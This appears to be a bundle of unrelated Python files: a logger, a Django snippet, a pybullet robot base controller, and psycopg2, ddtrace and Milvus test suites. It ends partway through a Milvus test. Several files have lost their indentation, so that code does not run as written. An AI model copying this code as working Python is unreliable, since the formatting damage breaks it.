avscan.project = project
avscan.clamav = ""
avscan.bitdefender = output
avscan.esetnod32 = ""
avscan.save()
project.status = 4
project.time = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
project.save()
|
logger.py
|
#!/usr/bin/env python
# Copyright 2013, Institute for Bioinformatics and Evolutionary Studies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import logging
import multiprocessing
def setup(logfile=None, loglevel=logging.INFO):
    # Set up the shared multiprocessing logger so that all N workers can
    # log safely and simultaneously. (The logfile argument is currently
    # unused; everything goes to stdout.)
    logger = multiprocessing.get_logger()
    logger.setLevel(loglevel)
    log_handler = logging.StreamHandler(sys.stdout)
    log_handler.setFormatter(logging.Formatter(
        '[%(asctime)s %(levelname)s %(process)s] %(message)s'))
    log_handler.setLevel(loglevel)  # filter at the handler level as well
    logger.addHandler(log_handler)
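    # Note: calling setup() more than once attaches duplicate handlers to
    # the shared multiprocessing logger, so call it a single time up front.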
def info(message):
    logger = multiprocessing.get_logger()
    logger.info("%s", message)
def error(message):
    logger = multiprocessing.get_logger()
    logger.error("%s", message)
def debug(message):
    logger = multiprocessing.get_logger()
    logger.debug("%s", message)
def warn(message):
    logger = multiprocessing.get_logger()
    logger.warning("%s", message)  # Logger.warn() is a deprecated alias
# From:
# http://stackoverflow.com/questions/641420/how-should-i-log-while-using-
# multiprocessing-in-python/894284#894284
# Modified for StreamHandler (instead of RotatingFileHandler)
#from logging.handlers import RotatingFileHandler
#from logging.handlers import StreamHandler
# import multiprocessing, threading, logging, sys, traceback
# class MultiProcessingLog(logging.Handler):
# def __init__(self, name, mode, maxsize, rotate):
# logging.Handler.__init__(self)
# #self._handler = RotatingFileHandler(name, mode, maxsize, rotate)
# self._handler = logging.StreamHandler(sys.stdout)
# self.queue = multiprocessing.Queue(-1)
# t = threading.Thread(target=self.receive)
# t.daemon = True
# t.start()
# def setFormatter(self, fmt='[%(asctime)s %(levelname)s %(process)s] %(message)s'):
# logging.Handler.setFormatter(self, fmt)
# self._handler.setFormatter(fmt)
# def receive(self):
# while True:
# try:
# record = self.queue.get()
# self._handler.emit(record)
# except (KeyboardInterrupt, SystemExit):
# raise
# except EOFError:
# break
# except:
# traceback.print_exc(file=sys.stderr)
# def send(self, s):
# self.queue.put_nowait(s)
# def _format_record(self, record):
# # ensure that exc_info and args
# # have been stringified. Removes any chance of
# # unpickleable things inside and possibly reduces
# # message size sent over the pipe
# if record.args:
# record.msg = record.msg % record.args
# record.args = None
# if record.exc_info:
# dummy = self.format(record)
# record.exc_info = None
# return record
# def emit(self, record):
# try:
# s = self._format_record(record)
# self.send(s)
# except (KeyboardInterrupt, SystemExit):
# raise
# except:
# self.handleError(record)
# def close(self):
# self._handler.close()
# logging.Handler.close(self)
|
snippet.py
|
from multiprocessing import Process
from django.core import serializers
from django.core.management import call_command
from io import StringIO  # Python 3; this was `from StringIO import StringIO` on Python 2
def dump_database():
sio = StringIO()
call_command('dumpdata', stdout=sio, natural=True)
return sio.getvalue()
def call_command_with_db(dbdump, *args, **kwargs):
objects = serializers.deserialize('json', dbdump)
for obj in objects:
obj.save()
return call_command(*args, **kwargs)
def do_something():
dbdump = dump_database()
process = Process(target=call_command_with_db, args=(dbdump, 'runserver',))
process.start()
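# Usage note (an inference, not part of the original snippet): the child
# process replays a JSON snapshot of the parent's database before running
# the management command, which is mainly useful when the child cannot see
# the parent's data directly, e.g. with an in-memory SQLite test database.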
|
base_controller.py
|
#!/usr/bin/env python
# coding: utf-8
import time
import atexit
import weakref
import pybullet
import threading
from qibullet.tools import *
class BaseController(object):
"""
Class describing a robot base controller
"""
_instances = set()
FRAME_WORLD = 1
FRAME_ROBOT = 2
def __init__(self, robot_model, physicsClientId=0):
"""
Constructor
Parameters:
robot_model - the pybullet model of the robot
physicsClientId - The id of the simulated instance in which the
robot will be controlled
"""
self.robot_model = robot_model
self.physics_client = physicsClientId
self.linear_velocity = 0
self.angular_velocity = 0
self.linear_acceleration = 0
self.angular_acceleration = 0
self.control_process = threading.Thread(target=None)
self.frame = BaseController.FRAME_ROBOT
self.pose_init = {}
self.pose_goal = {}
self._instances.add(weakref.ref(self))
self._controller_termination = False
atexit.register(self._terminateController)
@classmethod
def _getInstances(cls):
"""
INTERNAL CLASSMETHOD, get all of the BaseController (and daughters)
instances
"""
dead = set()
for ref in cls._instances:
obj = ref()
if obj is not None:
yield obj
else:
dead.add(ref)
cls._instances -= dead
def _setGoal(self, x, y, theta, frame):
"""
INTERNAL METHOD, set the position of the goal to a specific frame.
Parameters:
x - position of the goal on the x axis, in meters
y - position of the goal on the y axis, in meters
theta - orientation of the goal around the z axis, in radians
frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
FRAME_ROBOT = 2
"""
self.goal = [x, y, theta]
self.frame = frame
def _updateGoal(self):
"""
INTERNAL METHOD, update the position of the goal.
"""
# get actual position in frame world
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
x, y, theta = self.goal
# pose x, y, z
pose_requested = [x, y, 0]
# orientation requested (euler)
orn_requested = [0, 0, theta]
# if we are in frame robot express the position in the frame world
if self.frame == BaseController.FRAME_ROBOT:
orn_euler = pybullet.getEulerFromQuaternion(actual_orn)
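            # 2D rotation of the requested offset by the robot's current
            # yaw, followed by a translation to the robot's position:
            #   x_world = x * cos(yaw) - y * sin(yaw) + x_robot
            #   y_world = x * sin(yaw) + y * cos(yaw) + y_robot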
pose_requested = [
pose_requested[0] * math.cos(orn_euler[2])
- pose_requested[1] * math.sin(orn_euler[2])
+ actual_pos[0],
pose_requested[0] * math.sin(orn_euler[2])
+ pose_requested[1] * math.cos(orn_euler[2])
+ actual_pos[1],
0]
orn_requested = [
orn_euler[0],
orn_euler[1],
orn_euler[2] + theta]
self.pose_goal["position"] = pose_requested
self.pose_goal["orientation"] = orn_requested
def setLinearVelocity(self, linear_velocity):
"""
Set the linear velocity.
Parameter:
linear_velocity : The linear velocity value in m/s
"""
self.linear_velocity = linear_velocity
def _setAngularVelocity(self, angular_velocity):
"""
INTERNAL METHOD, set the angular velocity.
Parameter:
angular_velocity : The angular velocity value in rad/s
"""
self.angular_velocity = angular_velocity
def _setLinearAcceleration(self, linear_acceleration):
"""
INTERNAL METHOD, set the linear acceleration.
Parameter:
linear_acceleration : The linear acceleration value in m/s^2
"""
self.linear_acceleration = linear_acceleration
def _setAngularAcceleration(self, angular_acceleration):
"""
INTERNAL METHOD, set the angular acceleration.
Parameter:
angular_acceleration : The angular acceleration value in rad/s^2
"""
self.angular_acceleration = angular_acceleration
def _terminateController(self):
"""
INTERNAL METHOD, can be called to terminate an asynchronous controller.
Should only be used when killing the simulation
"""
self._controller_termination = True
        if self.control_process.is_alive():  # isAlive() was removed in Python 3.9
self.control_process.join()
class PepperBaseController(BaseController):
"""
Class describing a Pepper base controller
"""
MAX_LINEAR_VELOCITY = 0.55
MIN_LINEAR_VELOCITY = 0.1
MAX_ANGULAR_VELOCITY = 2.0
MIN_ANGULAR_VELOCITY = 0.3
MAX_LINEAR_ACCELERATION = 0.55
MIN_LINEAR_ACCELERATION = 0.1
MAX_ANGULAR_ACCELERATION = 3.0
MIN_ANGULAR_ACCELERATION = 0.1
def __init__(
self,
robot_model,
speed,
acceleration,
motion_constraint,
physicsClientId=0):
"""
Constructor
Parameters:
robot_model - the pybullet model of the robot
speed - list containing the linear velocity and the angular
velocity values, in m/s
acceleration - list containing the linear acceleration and angular
acceleration values, in m/s^2
motion_constraint - the pybullet motion constraint applied on the
robot
physicsClientId - The id of the simulated instance in which Pepper
will be controlled
"""
BaseController.__init__(
self,
robot_model,
physicsClientId=physicsClientId)
# Set the different speeds and accelerations
self.setLinearVelocity(speed[0])
self._setAngularVelocity(speed[1])
self._setLinearAcceleration(acceleration[0])
self._setAngularAcceleration(acceleration[1])
# force applied in the movement
self.force = 100
        # The robot will stop the movement with a precision of 0.01 m and
        # 0.02 rad
self.linear_threshold = 0.01
self.angular_threshold = 0.02
self.motion_constraint = motion_constraint
def setLinearVelocity(self, linear_velocity):
"""
Set the linear velocity.
Parameter:
linear_velocity : The linear velocity value in m/s
"""
if linear_velocity > PepperBaseController.MAX_LINEAR_VELOCITY:
linear_velocity = PepperBaseController.MAX_LINEAR_VELOCITY
elif linear_velocity < PepperBaseController.MIN_LINEAR_VELOCITY:
linear_velocity = PepperBaseController.MIN_LINEAR_VELOCITY
BaseController.setLinearVelocity(self, linear_velocity)
def _setAngularVelocity(self, angular_velocity):
"""
INTERNAL METHOD, set the angular velocity.
Parameter:
angular_velocity : The angular velocity value in rad/s
"""
if angular_velocity > PepperBaseController.MAX_ANGULAR_VELOCITY:
angular_velocity = PepperBaseController.MAX_ANGULAR_VELOCITY
elif angular_velocity < PepperBaseController.MIN_ANGULAR_VELOCITY:
angular_velocity = PepperBaseController.MIN_ANGULAR_VELOCITY
BaseController._setAngularVelocity(self, angular_velocity)
def _setLinearAcceleration(self, linear_acceleration):
"""
INTERNAL METHOD, set the linear acceleration.
Parameter:
linear_acceleration : The linear acceleration value in m/s^2
"""
if linear_acceleration > PepperBaseController.MAX_LINEAR_ACCELERATION:
linear_acceleration = PepperBaseController.MAX_LINEAR_ACCELERATION
elif linear_acceleration <\
PepperBaseController.MIN_LINEAR_ACCELERATION:
linear_acceleration = PepperBaseController.MIN_LINEAR_ACCELERATION
BaseController._setLinearAcceleration(self, linear_acceleration)
def _setAngularAcceleration(self, angular_acceleration):
"""
INTERNAL METHOD, set the angular acceleration.
Parameter:
angular_acceleration : The angular acceleration value in rad/s^2
"""
if angular_acceleration >\
PepperBaseController.MAX_ANGULAR_ACCELERATION:
angular_acceleration =\
PepperBaseController.MAX_ANGULAR_ACCELERATION
elif angular_acceleration <\
PepperBaseController.MIN_ANGULAR_ACCELERATION:
angular_acceleration =\
PepperBaseController.MIN_ANGULAR_ACCELERATION
BaseController._setAngularAcceleration(self, angular_acceleration)
def moveTo(self, x, y, theta, frame, _async=False):
"""
Move the robot in frame world or robot (FRAME_WORLD=1, FRAME_ROBOT=2).
        This method can be called synchronously or asynchronously. In
        asynchronous mode, calling the method while a motion is already
        running updates the goal of that motion.
Parameters:
x - position of the goal on the x axis, in meters
y - position of the goal on the y axis, in meters
theta - orientation of the goal around the z axis, in radians
frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
FRAME_ROBOT = 2
            _async - The method is launched in async mode if True, in sync
                mode if False (False by default)
"""
self._setGoal(x, y, theta, frame)
        if self.control_process.is_alive():
if _async is False:
                raise pybullet.error(
                    "An asynchronous moveTo is already running, cannot "
                    "launch a synchronous moveTo")
self._initProcess()
elif _async:
self.control_process = threading.Thread(target=self._moveToProcess)
self.control_process.start()
else:
self._moveToProcess()
def move(self, x, y, theta):
"""
Apply a speed on the robot's base.
Parameters:
x - Speed on the x axis, in m/s
y - Speed on the y axis, in m/s
theta - Rotational speed around the z axis, in rad/s
"""
# Kill any previous moveTo process running
self.moveTo(0, 0, 0, frame=BaseController.FRAME_ROBOT, _async=True)
        # Bound the velocity. The max acceleration is not taken into account
        # here; this is a potential improvement
if abs(x) > PepperBaseController.MAX_LINEAR_VELOCITY:
x = PepperBaseController.MAX_LINEAR_VELOCITY * (x/abs(x))
if abs(y) > PepperBaseController.MAX_LINEAR_VELOCITY:
y = PepperBaseController.MAX_LINEAR_VELOCITY * (y/abs(y))
if abs(theta) > PepperBaseController.MAX_ANGULAR_VELOCITY:
theta = PepperBaseController.MAX_ANGULAR_VELOCITY *\
(theta/abs(theta))
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert actual_orn into euler
actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
linear_world_velocity = [
x * math.cos(actual_orn[2]) - y * math.sin(actual_orn[2]),
x * math.sin(actual_orn[2]) + y * math.cos(actual_orn[2]),
0]
time.sleep(0.02)
pybullet.resetBaseVelocity(
self.robot_model,
linear_world_velocity,
[0, 0, theta],
physicsClientId=self.physics_client)
def _updateConstraint(self):
"""
INTERNAL METHOD, update the robot's constraint.
"""
# Change the constraint to the requested position and orientation
pybullet.changeConstraint(
self.motion_constraint,
self.pose_goal["position"],
jointChildFrameOrientation=pybullet.getQuaternionFromEuler(
self.pose_goal["orientation"]),
maxForce=self.force,
physicsClientId=self.physics_client)
def _initProcess(self):
"""
INTERNAL METHOD, initialize the motion process and all variables
needed.
"""
# Get actual position in frame world
self.pose_init["position"], self.pose_init["orientation"] =\
pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert pose_init orientation in orn_euler
self.pose_init["orientation"] = pybullet.getEulerFromQuaternion(
self.pose_init["orientation"]
)
self._updateGoal()
self._updateConstraint()
        # Compute the per-axis ratio of the requested displacement to the
        # total distance
distance = getDistance(
self.pose_init["position"],
self.pose_goal["position"])
self.p_x = 0
self.p_y = 0
self.p_theta = 0
if distance:
self.p_x = (
self.pose_goal["position"][0] -
self.pose_init["position"][0]) / distance
self.p_y = (
self.pose_goal["position"][1] -
self.pose_init["position"][1]) / distance
theta_to_do = getOrientation(
self.pose_init["orientation"],
self.pose_goal["orientation"])
if abs(theta_to_do):
self.p_theta = abs(theta_to_do) / theta_to_do
def _endProcess(self):
"""
INTERNAL METHOD, stop the robot movement.
"""
# Change the constraint to the actual position and orientation in
# order to stop the robot's motion. The force applied is purposely huge
# to avoid oscillations.
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
pybullet.changeConstraint(
self.motion_constraint,
actual_pos,
jointChildFrameOrientation=actual_orn,
maxForce=self.force * 10,
physicsClientId=self.physics_client)
pybullet.resetBaseVelocity(
self.robot_model,
[0, 0, 0],
[0, 0, 0],
physicsClientId=self.physics_client)
def _moveToProcess(self):
"""
        INTERNAL METHOD, the process that moves the robot's base.
"""
self._initProcess()
init_pos = self.pose_init["position"]
init_orn = self.pose_init["orientation"]
actual_pos = init_pos
actual_orn = init_orn
while not self._controller_termination:
translation_distance = getDistance(
actual_pos,
self.pose_goal["position"])
            # Wrap the goal orientation via a quaternion round-trip
modulo_quater_pose_goal = pybullet.getQuaternionFromEuler(
self.pose_goal["orientation"])
# Conversion into euler
modulo_euler_pose_goal = pybullet.getEulerFromQuaternion(
modulo_quater_pose_goal)
rotation_distance = abs(getOrientation(
actual_orn,
modulo_euler_pose_goal))
if translation_distance < self.linear_threshold and\
rotation_distance < self.angular_threshold:
break
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
# convert actual_orn into euler
actual_orn = pybullet.getEulerFromQuaternion(actual_orn)
linear_vel_x = computeVelocity(
self.linear_acceleration,
0.05,
self.linear_velocity,
getDistance(actual_pos, init_pos),
getDistance(actual_pos, self.pose_goal["position"]))
linear_vel_y = linear_vel_x
angular_vel = computeVelocity(
self.angular_acceleration,
0.05,
self.angular_velocity,
abs(getOrientation(
init_orn,
actual_orn)),
abs(getOrientation(
actual_orn,
self.pose_goal["orientation"])))
            # If the robot has reached the requested position along an axis,
            # set the corresponding velocity to 0.
if abs(actual_pos[0] - self.pose_goal["position"][0]) <=\
self.linear_threshold / 2:
linear_vel_x = 0
if abs(actual_pos[1] - self.pose_goal["position"][1]) <=\
self.linear_threshold / 2:
linear_vel_y = 0
if abs(getOrientation(
actual_orn, self.pose_goal["orientation"])) <=\
self.angular_threshold:
angular_vel = 0
# Reset the velocity of the robot
time.sleep(0.02)
pybullet.resetBaseVelocity(
self.robot_model,
[linear_vel_x * self.p_x, linear_vel_y * self.p_y, 0],
[0, 0, angular_vel * self.p_theta],
physicsClientId=self.physics_client)
self._endProcess()
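# Usage sketch: assuming a pybullet simulation that has already spawned the
# robot and created the base motion constraint (robot_model, base_constraint
# and client are placeholders for objects the simulation provides):
#
#     controller = PepperBaseController(
#         robot_model, [0.35, 1.0], [0.3, 0.3],
#         base_constraint, physicsClientId=client)
#     controller.moveTo(1.0, 0.0, 0.0, BaseController.FRAME_ROBOT)  # blocking
#     controller.moveTo(
#         0.0, 0.0, 1.57, BaseController.FRAME_ROBOT, _async=True)  # returns
#     controller.move(0.2, 0.0, 0.0)  # apply a raw base velocity instead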
|
test_transaction.py
|
#!/usr/bin/env python
# test_transaction - unit test on transaction behaviour
#
# Copyright (C) 2007-2011 Federico Di Gregorio <fog@debian.org>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import threading
from testutils import unittest, ConnectingTestCase, skip_before_postgres, slow
import psycopg2
from psycopg2.extensions import (
ISOLATION_LEVEL_SERIALIZABLE, STATUS_BEGIN, STATUS_READY)
class TransactionTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
curs = self.conn.cursor()
curs.execute('''
CREATE TEMPORARY TABLE table1 (
id int PRIMARY KEY
)''')
# The constraint is set to deferrable for the commit_failed test
curs.execute('''
CREATE TEMPORARY TABLE table2 (
id int PRIMARY KEY,
table1_id int,
CONSTRAINT table2__table1_id__fk
FOREIGN KEY (table1_id) REFERENCES table1(id) DEFERRABLE)''')
curs.execute('INSERT INTO table1 VALUES (1)')
curs.execute('INSERT INTO table2 VALUES (1, 1)')
self.conn.commit()
def test_rollback(self):
# Test that rollback undoes changes
curs = self.conn.cursor()
curs.execute('INSERT INTO table2 VALUES (2, 1)')
# Rollback takes us from BEGIN state to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.conn.rollback()
self.assertEqual(self.conn.status, STATUS_READY)
curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
self.assertEqual(curs.fetchall(), [])
def test_commit(self):
# Test that commit stores changes
curs = self.conn.cursor()
curs.execute('INSERT INTO table2 VALUES (2, 1)')
        # Commit takes us from BEGIN state to READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.conn.commit()
self.assertEqual(self.conn.status, STATUS_READY)
# Now rollback and show that the new record is still there:
self.conn.rollback()
curs.execute('SELECT id, table1_id FROM table2 WHERE id = 2')
self.assertEqual(curs.fetchall(), [(2, 1)])
def test_failed_commit(self):
# Test that we can recover from a failed commit.
# We use a deferred constraint to cause a failure on commit.
curs = self.conn.cursor()
curs.execute('SET CONSTRAINTS table2__table1_id__fk DEFERRED')
curs.execute('INSERT INTO table2 VALUES (2, 42)')
        # The commit should fail and leave the connection in READY state
self.assertEqual(self.conn.status, STATUS_BEGIN)
self.assertRaises(psycopg2.IntegrityError, self.conn.commit)
self.assertEqual(self.conn.status, STATUS_READY)
# The connection should be ready to use for the next transaction:
curs.execute('SELECT 1')
self.assertEqual(curs.fetchone()[0], 1)
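# The failed-commit recovery exercised above reduces to this sequence (a
# sketch using only statements from the test itself):
#
#     curs.execute('SET CONSTRAINTS table2__table1_id__fk DEFERRED')
#     curs.execute('INSERT INTO table2 VALUES (2, 42)')  # violates the FK
#     try:
#         conn.commit()                  # the deferred check fires here
#     except psycopg2.IntegrityError:
#         pass                           # connection is back to STATUS_READY
#     curs.execute('SELECT 1')           # and immediately usable again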
class DeadlockSerializationTests(ConnectingTestCase):
"""Test deadlock and serialization failure errors."""
def connect(self):
conn = ConnectingTestCase.connect(self)
conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
return conn
def setUp(self):
ConnectingTestCase.setUp(self)
curs = self.conn.cursor()
# Drop table if it already exists
try:
curs.execute("DROP TABLE table1")
self.conn.commit()
except psycopg2.DatabaseError:
self.conn.rollback()
try:
curs.execute("DROP TABLE table2")
self.conn.commit()
except psycopg2.DatabaseError:
self.conn.rollback()
# Create sample data
curs.execute("""
CREATE TABLE table1 (
id int PRIMARY KEY,
name text)
""")
curs.execute("INSERT INTO table1 VALUES (1, 'hello')")
curs.execute("CREATE TABLE table2 (id int PRIMARY KEY)")
self.conn.commit()
def tearDown(self):
curs = self.conn.cursor()
curs.execute("DROP TABLE table1")
curs.execute("DROP TABLE table2")
self.conn.commit()
ConnectingTestCase.tearDown(self)
@slow
def test_deadlock(self):
self.thread1_error = self.thread2_error = None
step1 = threading.Event()
step2 = threading.Event()
def task1():
try:
conn = self.connect()
curs = conn.cursor()
curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
step1.set()
step2.wait()
curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
            except psycopg2.DatabaseError as exc:
self.thread1_error = exc
step1.set()
conn.close()
def task2():
try:
conn = self.connect()
curs = conn.cursor()
step1.wait()
curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE")
step2.set()
curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE")
            except psycopg2.DatabaseError as exc:
self.thread2_error = exc
step2.set()
conn.close()
# Run the threads in parallel. The "step1" and "step2" events
# ensure that the two transactions overlap.
thread1 = threading.Thread(target=task1)
thread2 = threading.Thread(target=task2)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# Exactly one of the threads should have failed with
# TransactionRollbackError:
self.assertFalse(self.thread1_error and self.thread2_error)
error = self.thread1_error or self.thread2_error
self.assertTrue(isinstance(
error, psycopg2.extensions.TransactionRollbackError))
@slow
def test_serialisation_failure(self):
self.thread1_error = self.thread2_error = None
step1 = threading.Event()
step2 = threading.Event()
def task1():
try:
conn = self.connect()
curs = conn.cursor()
curs.execute("SELECT name FROM table1 WHERE id = 1")
curs.fetchall()
step1.set()
step2.wait()
curs.execute("UPDATE table1 SET name='task1' WHERE id = 1")
conn.commit()
            except psycopg2.DatabaseError as exc:
self.thread1_error = exc
step1.set()
conn.close()
def task2():
try:
conn = self.connect()
curs = conn.cursor()
step1.wait()
curs.execute("UPDATE table1 SET name='task2' WHERE id = 1")
conn.commit()
            except psycopg2.DatabaseError as exc:
self.thread2_error = exc
step2.set()
conn.close()
# Run the threads in parallel. The "step1" and "step2" events
# ensure that the two transactions overlap.
thread1 = threading.Thread(target=task1)
thread2 = threading.Thread(target=task2)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
# Exactly one of the threads should have failed with
# TransactionRollbackError:
self.assertFalse(self.thread1_error and self.thread2_error)
error = self.thread1_error or self.thread2_error
self.assertTrue(isinstance(
error, psycopg2.extensions.TransactionRollbackError))
class QueryCancellationTests(ConnectingTestCase):
"""Tests for query cancellation."""
def setUp(self):
ConnectingTestCase.setUp(self)
self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
@skip_before_postgres(8, 2)
def test_statement_timeout(self):
curs = self.conn.cursor()
# Set a low statement timeout, then sleep for a longer period.
curs.execute('SET statement_timeout TO 10')
self.assertRaises(psycopg2.extensions.QueryCanceledError,
curs.execute, 'SELECT pg_sleep(50)')
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
test_request_safety.py
|
import threading
import asyncio
import aiohttp_jinja2
from urllib import request
from nose.tools import eq_
from aiohttp.test_utils import unittest_run_loop
from ddtrace.pin import Pin
from ddtrace.provider import DefaultContextProvider
from ddtrace.contrib.aiohttp.patch import patch, unpatch
from ddtrace.contrib.aiohttp.middlewares import trace_app
from .utils import TraceTestCase
class TestAiohttpSafety(TraceTestCase):
"""
    Ensure that when the tracer is not configured with the proper asyncio
    context provider, bad traces are produced but the ``Context`` objects
    do not leak memory.
"""
def setUp(self):
super().setUp()
asyncio.set_event_loop(self.loop)
def enable_tracing(self):
# aiohttp TestCase with the wrong context provider
trace_app(self.app, self.tracer)
patch()
Pin.override(aiohttp_jinja2, tracer=self.tracer)
self.tracer.configure(context_provider=DefaultContextProvider())
def disable_tracing(self):
unpatch()
@unittest_run_loop
@asyncio.coroutine
def test_full_request(self):
# it should create a root span when there is a handler hit
# with the proper tags
        response = yield from self.client.request('GET', '/template/')
        eq_(200, response.status)
        yield from response.text()
# the trace is created
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(2, len(traces[0]))
request_span = traces[0][0]
template_span = traces[0][1]
# request
eq_('aiohttp-web', request_span.service)
eq_('aiohttp.request', request_span.name)
eq_('/template/', request_span.resource)
# template
eq_('aiohttp-web', template_span.service)
eq_('aiohttp.template', template_span.name)
eq_('aiohttp.template', template_span.resource)
@unittest_run_loop
@asyncio.coroutine
def test_multiple_full_request(self):
# it should produce a wrong trace, but the Context must
# be finished
def make_requests():
url = self.client.make_url('/delayed/')
response = request.urlopen(str(url)).read().decode('utf-8')
eq_('Done', response)
# blocking call executed in different threads
ctx = self.tracer.get_call_context()
threads = [threading.Thread(target=make_requests) for _ in range(10)]
for t in threads:
t.daemon = True
t.start()
# we should yield so that this loop can handle
# threads' requests
yield from asyncio.sleep(0.5)
for t in threads:
t.join(timeout=0.5)
# the trace is wrong but the Context is finished
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(10, len(traces[0]))
eq_(0, len(ctx._trace))
|
test_collection.py
|
import pdb
import pytest
import logging
import itertools
import time
from multiprocessing import Process
from milvus import IndexType, MetricType
from utils import *
dim = 128
drop_collection_interval_time = 3
index_file_size = 10
vectors = gen_vectors(100, dim)
class TestCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
def test_create_collection(self, connect):
'''
target: test create normal collection
        method: create collection with correct params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_ip(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_jaccard(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_hamming(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_substructure(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_superstructure(self, connect):
'''
target: test create normal collection
method: create collection with corrent params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
status = connect.create_collection(param)
assert status.OK()
# @pytest.mark.level(2)
# def test_create_collection_without_connection(self, dis_connect):
# '''
# target: test create collection, without connection
# method: create collection with correct params, with a disconnected instance
# expected: create raise exception
# '''
# collection_name = gen_unique_str("test_collection")
# param = {'collection_name': collection_name,
# 'dimension': dim,
# 'index_file_size': index_file_size,
# 'metric_type': MetricType.L2}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_collection(param)
def test_create_collection_existed(self, connect):
'''
        target: test create collection when the collection name already exists
        method: create collection twice with the same collection_name
expected: create status return not ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_collection(param)
assert not status.OK()
@pytest.mark.level(2)
def test_create_collection_existed_ip(self, connect):
'''
        target: test create collection when the collection name already exists
        method: create collection twice with the same collection_name
expected: create status return not ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
status = connect.create_collection(param)
status = connect.create_collection(param)
assert not status.OK()
def test_create_collection_None(self, connect):
'''
target: test create collection but the collection name is None
method: create collection, param collection_name is None
expected: create raise error
'''
param = {'collection_name': None,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_create_collection_no_dimension(self, connect):
'''
target: test create collection with no dimension params
        method: create collection without the dimension param
        expected: raise an exception
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_create_collection_no_file_size(self, connect):
'''
target: test create collection with no index_file_size params
        method: create collection without the index_file_size param
expected: create status return ok, use default 1024
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'metric_type': MetricType.L2}
